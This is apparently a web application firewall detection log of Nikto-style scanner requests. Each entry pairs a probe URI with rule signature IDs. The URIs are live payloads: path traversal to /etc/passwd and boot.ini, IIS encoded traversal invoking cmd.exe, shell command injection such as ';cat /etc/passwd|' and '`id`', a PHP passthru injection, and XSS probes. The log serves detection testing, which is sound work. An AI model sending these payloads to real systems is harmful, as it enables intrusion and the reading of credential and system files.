Packet [2443]	Uri [/modif_infos.asp?n=/etc/passwd%00]	Nattacks [5 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]
Packet [2444]	Uri [/modif_infos.asp?n=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [2454]	Uri [/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [2476]	Uri [/mpcsoftweb_guestbook/database/mpcSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [2477]	Uri [/mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [2479]	Uri [/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2480]	Uri [/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2481]	Uri [/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920272]	[930100]	[930110]
Packet [2482]	Uri [/msadc/msadcs.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [2483]	Uri [/msadc/msaSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [2487]	Uri [/msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930110]	[942460]
Packet [2508]	Uri [/myinvoicer/config.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [2509]	Uri [/mylog.phtml?screen=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [2510]	Uri [/myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent]	Nattacks [3 ]	Signatures	[941180]	[942431]	[942460]
Packet [2511]	Uri [/myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=]	Nattacks [2 ]	Signatures	[942431]	[942460]
Packet [2512]	Uri [/mysql/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [2523]	Uri [/netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [2524]	Uri [/netget?sid=user&msg=300&file=../../../../../../../../../boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [2530]	Uri [/news/news.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [2531]	Uri [/news/newSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [2533]	Uri [/newuser?Image=../../database/rbsserv.mdb]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [2534]	Uri [/nikto.ida]	Nattacks [1 ]	Signatures	[920440]
Packet [2545]	Uri [/nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [2546]	Uri [/nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [2552]	Uri [/nsn/..%5Cutil/attrib.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2553]	Uri [/nsn/..%5Cutil/attSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2554]	Uri [/nsn/..%5Cutil/chkSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2555]	Uri [/nsn/..%5Cutil/chkvol.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2556]	Uri [/nsn/..%5Cutil/copSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2557]	Uri [/nsn/..%5Cutil/copy.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2558]	Uri [/nsn/..%5Cutil/del.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2559]	Uri [/nsn/..%5Cutil/delSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2560]	Uri [/nsn/..%5Cutil/dir.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2561]	Uri [/nsn/..%5Cutil/dirSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2562]	Uri [/nsn/..%5Cutil/dsbrowse.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2563]	Uri [/nsn/..%5Cutil/dsbSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2564]	Uri [/nsn/..%5Cutil/gliSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2565]	Uri [/nsn/..%5Cutil/glist.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2566]	Uri [/nsn/..%5Cutil/lancard.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2567]	Uri [/nsn/..%5Cutil/lanSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2568]	Uri [/nsn/..%5Cutil/md.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2569]	Uri [/nsn/..%5Cutil/md.SensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2570]	Uri [/nsn/..%5Cutil/rd.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2571]	Uri [/nsn/..%5Cutil/rd.SensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2572]	Uri [/nsn/..%5Cutil/ren.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2573]	Uri [/nsn/..%5Cutil/renSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2574]	Uri [/nsn/..%5Cutil/send.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2575]	Uri [/nsn/..%5Cutil/senSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2576]	Uri [/nsn/..%5Cutil/set.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2577]	Uri [/nsn/..%5Cutil/setSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2578]	Uri [/nsn/..%5Cutil/sliSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2579]	Uri [/nsn/..%5Cutil/slist.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2580]	Uri [/nsn/..%5Cutil/type.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2581]	Uri [/nsn/..%5Cutil/typSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2582]	Uri [/nsn/..%5Cutil/userlist.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2583]	Uri [/nsn/..%5Cutil/useSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2584]	Uri [/nsn/..%5Cweb/env.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2585]	Uri [/nsn/..%5Cweb/envSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2586]	Uri [/nsn/..%5Cweb/fdir.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2587]	Uri [/nsn/..%5Cweb/fdiSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2588]	Uri [/nsn/..%5Cwebdemo/env.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2589]	Uri [/nsn/..%5Cwebdemo/envSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2590]	Uri [/nsn/..%5Cwebdemo/fdir.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2591]	Uri [/nsn/..%5Cwebdemo/fdiSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2605]	Uri [/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full]	Nattacks [1 ]	Signatures	[920440]
Packet [2606]	Uri [/NULL.printer]	Nattacks [1 ]	Signatures	[920440]
Packet [2612]	Uri [/oem_webstage/oem.conf]	Nattacks [1 ]	Signatures	[920440]
Packet [2617]	Uri [/officescan/hotdownload/ofscan.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [2618]	Uri [/officescan/hotdownload/ofsSensePostNotThereNoNo.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [2624]	Uri [/opendir.php?/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [2625]	Uri [/opendir.php?requesturl=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [2626]	Uri [/OpenFile.aspx?file=../../../../../../../../../../boot.ini]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [2633]	Uri [/order/order_log.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [2634]	Uri [/order/order_log_v12.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [2635]	Uri [/order/ordSensePostNotThereNoNo.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [2639]	Uri [/orders/mountain.cfg]	Nattacks [1 ]	Signatures	[920440]
Packet [2640]	Uri [/orders/mouSensePostNotThereNoNo.cfg]	Nattacks [1 ]	Signatures	[920440]
Packet [2641]	Uri [/orders/orders.log]	Nattacks [1 ]	Signatures	[920440]
Packet [2643]	Uri [/Orders/order_log.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [2644]	Uri [/orders/order_log.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [2645]	Uri [/Orders/order_log_v12.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [2646]	Uri [/orders/order_log_v12.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [2647]	Uri [/Orders/ordSensePostNotThereNoNo.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [2648]	Uri [/orders/ordSensePostNotThereNoNo.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [2649]	Uri [/orders/ordSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [2659]	Uri [/ows-bin/perlidlc.bat?&dir]	Nattacks [1 ]	Signatures	[920440]
Packet [2665]	Uri [/page.cgi?../../../../../../../../../../etc/passwd]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930120]	[932160]
Packet [2674]	Uri [/password.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [2679]	Uri [/path/nw/article.php?id=']	Nattacks [2 ]	Signatures	[942110]	[942330]
Packet [2680]	Uri [/pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2681]	Uri [/pbserver/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920272]	[930100]	[930110]
Packet [2682]	Uri [/pbserver/pbserver.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [2683]	Uri [/pbserver/pbsSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [2684]	Uri [/pccsmysqladm/incs/dbconnect.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [2685]	Uri [/pccsmysqladm/incs/dbcSensePostNotThereNoNo.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [2687]	Uri [/PDG_Cart/oder.log]	Nattacks [1 ]	Signatures	[920440]
Packet [2688]	Uri [/PDG_Cart/odeSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [2689]	Uri [/PDG_Cart/shopper.conf]	Nattacks [1 ]	Signatures	[920440]
Packet [2692]	Uri [/perl/-e%20%22system('cat%20/etc/passwd');\%22]	Nattacks [1 ]	Signatures	[933160]
Packet [2715]	Uri [/php.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [2723]	Uri [/php/mylog.phtml?screen=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [2724]	Uri [/php/php.exe?c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [2726]	Uri [/php/php4ts.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [2727]	Uri [/php/phpSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [2740]	Uri [/phpmyadmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [2743]	Uri [/phpping/index.php?pingto=www.test.com%20|%20dir%20c:\\]	Nattacks [1 ]	Signatures	[932110]
Packet [2744]	Uri [/phprocketaddin/?page=../../../../../../../../../../boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [2745]	Uri [/phprocketaddin/?page=../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [2748]	Uri [/phptonuke.php?filnavn=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [2749]	Uri [/phpwebfilemgr/index.php?f=../../../../../../../../../etc]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [2750]	Uri [/phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [2751]	Uri [/phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [2760]	Uri [/pls/sample/admin_/help/..%255cplsql.conf]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [2789]	Uri [/productcart/database/EIPC.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [2790]	Uri [/productcart/database/EIPSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [2814]	Uri [/prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [2815]	Uri [/PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [2816]	Uri [/pt_config.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [2828]	Uri [/put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [2838]	Uri [/pwd.db]	Nattacks [1 ]	Signatures	[920440]
Packet [2841]	Uri [/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [2848]	Uri [/quikmail/nph-emumail.cgi?type=../%00]	Nattacks [6 ]	Signatures	[920270]	[920271]	[920272]	[930110]	[930110]	[942460]
Packet [2849]	Uri [/quikmail/nphSensePostNotThereNoNo.cgi?type=../%00]	Nattacks [6 ]	Signatures	[920270]	[920271]	[920272]	[930110]	[930110]	[942460]
Packet [2850]	Uri [/quikstore.cfg]	Nattacks [1 ]	Signatures	[920440]
Packet [2869]	Uri [/ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [2873]	Uri [/rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2874]	Uri [/rpc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920272]	[930100]	[930110]
Packet [2875]	Uri [/rtm.log]	Nattacks [1 ]	Signatures	[920440]
Packet [2904]	Uri [/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2905]	Uri [/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2906]	Uri [/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920272]	[930100]	[930110]
Packet [2907]	Uri [/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920271]	[920272]	[930100]
Packet [2908]	Uri [/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\]	Nattacks [3 ]	Signatures	[920271]	[920272]	[930100]
Packet [2911]	Uri [/scripts/Carello/Carello.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [2912]	Uri [/scripts/Carello/CarSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [2923]	Uri [/scripts/cphost.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [2924]	Uri [/scripts/cphSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [2925]	Uri [/scripts/cpshost.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [2926]	Uri [/scripts/cpsSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [2927]	Uri [/scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [2940]	Uri [/scripts/httpodbc.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [2941]	Uri [/scripts/httSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [2942]	Uri [/scripts/iisadmin/bdir.htr]	Nattacks [1 ]	Signatures	[920440]
Packet [2943]	Uri [/scripts/iisadmin/bdiSensePostNotThereNoNo.htr]	Nattacks [1 ]	Signatures	[920440]
Packet [2944]	Uri [/scripts/iisadmin/ism.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [2945]	Uri [/scripts/iisadmin/ismSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [2949]	Uri [/scripts/proxy/w3proxy.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [2950]	Uri [/scripts/proxy/w3pSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [2953]	Uri [/scripts/samples/ctgSensePostNotThereNoNo.idc]	Nattacks [1 ]	Signatures	[920440]
Packet [2954]	Uri [/scripts/samples/ctguestb.idc]	Nattacks [1 ]	Signatures	[920440]
Packet [2955]	Uri [/scripts/samples/details.idc]	Nattacks [1 ]	Signatures	[920440]
Packet [2956]	Uri [/scripts/samples/detSensePostNotThereNoNo.idc]	Nattacks [1 ]	Signatures	[920440]
Packet [2957]	Uri [/scripts/samples/search/author.idq]	Nattacks [1 ]	Signatures	[920440]
Packet [2958]	Uri [/scripts/samples/search/filesize.idq]	Nattacks [1 ]	Signatures	[920440]
Packet [2959]	Uri [/scripts/samples/search/filetime.idq]	Nattacks [1 ]	Signatures	[920440]
Packet [2960]	Uri [/scripts/samples/search/qfullhit.htw]	Nattacks [1 ]	Signatures	[920440]
Packet [2961]	Uri [/scripts/samples/search/qsumrhit.htw]	Nattacks [1 ]	Signatures	[920440]
Packet [2962]	Uri [/scripts/samples/search/queryhit.idq]	Nattacks [1 ]	Signatures	[920440]
Packet [2963]	Uri [/scripts/samples/search/simple.idq]	Nattacks [1 ]	Signatures	[920440]
Packet [2966]	Uri [/scripts/tools/ctss.idc]	Nattacks [1 ]	Signatures	[920440]
Packet [2967]	Uri [/scripts/tools/ctsSensePostNotThereNoNo.idc]	Nattacks [1 ]	Signatures	[920440]
Packet [2976]	Uri [/scripts/tradecli.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [2977]	Uri [/scripts/tradecli.dll?template=nonexistfile?template=..\..\..\..\..\winnt\system32\cmd.exe?/c+dir]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [2978]	Uri [/scripts/traSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [2979]	Uri [/scripts/traSensePostNotThereNoNo.dll?template=nonexistfile?template=..\..\..\..\..\winnt\system32\cmd.exe?/c+dir]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [2987]	Uri [/search.asp?term=<%00script>alert('Vulnerable')</script>]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[941100]	[941110]	[941160]	[942130]	[942370]	[942431]	[942460]	[942511]
Packet [2998]	Uri [/search?NS-query-pat=../../../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [2999]	Uri [/search?NS-query-pat=..\..\..\..\..\..\..\..\..\..\boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [3021]	Uri [/servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22adminRealm%22%2C+uri%3D%22%2Fservlet%2Fadmin%22&service=]	Nattacks [5 ]	Signatures	[942110]	[942200]	[942260]	[942430]	[942431]
Packet [3025]	Uri [/servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [3054]	Uri [/servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [3055]	Uri [/servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3064]	Uri [/settings/site.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [3069]	Uri [/shop/database/metacart.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [3070]	Uri [/shop/database/metSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [3071]	Uri [/shop/member_html.cgi?file=;cat%20/etc/passwd|]	Nattacks [4 ]	Signatures	[930120]	[932100]	[932160]	[942110]
Packet [3072]	Uri [/shop/member_html.cgi?file=|cat%20/etc/passwd|]	Nattacks [3 ]	Signatures	[930120]	[932100]	[932160]
Packet [3073]	Uri [/shop/normal_html.cgi?file=../../../../../../etc/issue%00]	Nattacks [10 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [3074]	Uri [/shop/normal_html.cgi?file=;cat%20/etc/passwd|]	Nattacks [4 ]	Signatures	[930120]	[932100]	[932160]	[942110]
Packet [3075]	Uri [/shop/normal_html.cgi?file=|cat%20/etc/passwd|]	Nattacks [3 ]	Signatures	[930120]	[932100]	[932160]
Packet [3085]	Uri [/shoponline/fpdb/shop.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [3086]	Uri [/shoponline/fpdb/shoSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [3088]	Uri [/shopping/database/metacart.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [3089]	Uri [/shopping/database/metSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [3092]	Uri [/shopping300.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [3093]	Uri [/shopping400.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [3094]	Uri [/shoppingdirectory/midicart.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [3095]	Uri [/shoppingdirectory/midSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [3096]	Uri [/shoutbox.php?conf=../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3097]	Uri [/shoutbox/expanded.php?conf=../../../../../../../etc/passwd%20]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3105]	Uri [/Site/bizSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [3106]	Uri [/Site/biztalkhttpreceive.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [3186]	Uri [/sqldump.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [3187]	Uri [/sqlnet.log]	Nattacks [1 ]	Signatures	[920440]
Packet [3197]	Uri [/ss.cfg]	Nattacks [1 ]	Signatures	[920440]
Packet [3202]	Uri [/ssi/envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [3233]	Uri [/structure.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [3249]	Uri [/support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3264]	Uri [/sysuser/docmgr/iecreate.stm?template=../]	Nattacks [1 ]	Signatures	[930110]
Packet [3265]	Uri [/sysuser/docmgr/iecSensePostNotThereNoNo.stm/?template=..]	Nattacks [1 ]	Signatures	[930110]
Packet [3266]	Uri [/sysuser/docmgr/ieedit.stm?url=../]	Nattacks [1 ]	Signatures	[930110]
Packet [3267]	Uri [/sysuser/docmgr/ieeSensePostNotThereNoNo.stm/?url=..]	Nattacks [1 ]	Signatures	[930110]
Packet [3280]	Uri [/test.php?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x]	Nattacks [8 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942370]	[942431]	[942511]
Packet [3281]	Uri [/test.shtml?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x]	Nattacks [8 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942370]	[942431]	[942511]
Packet [3321]	Uri [/tmp_view.php?file=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [3332]	Uri [/trace.axd]	Nattacks [1 ]	Signatures	[920440]
Packet [3349]	Uri [/typo3conf/database.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [3350]	Uri [/typo3conf/datSensePostNotThereNoNo.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [3363]	Uri [/us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [3371]	Uri [/userreg.cgi?cmd=insert&amp;lang=eng&amp;tnum=3&amp;fld1=test999%0acat&lt;/var/spool/mail/login&gt;&gt;/etc/passwd]	Nattacks [5 ]	Signatures	[920272]	[921151]	[930120]	[932105]	[932160]
Packet [3383]	Uri [/vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [8 ]	Signatures	[932100]	[932110]	[933161]	[942110]	[942430]	[942510]	[942431]	[942460]
Packet [3384]	Uri [/vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [8 ]	Signatures	[932100]	[932110]	[933161]	[942110]	[942430]	[942510]	[942431]	[942460]
Packet [3436]	Uri [/vgn/login/1,501,,00.html?cookieName=x--\>]	Nattacks [2 ]	Signatures	[941180]	[942460]
Packet [3465]	Uri [/viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3466]	Uri [/viewpage.php?file=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [3467]	Uri [/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [3468]	Uri [/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [3480]	Uri [/web-console/ServerInfo.jsp%00]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [3484]	Uri [/web.config]	Nattacks [2 ]	Signatures	[920440]	[930130]
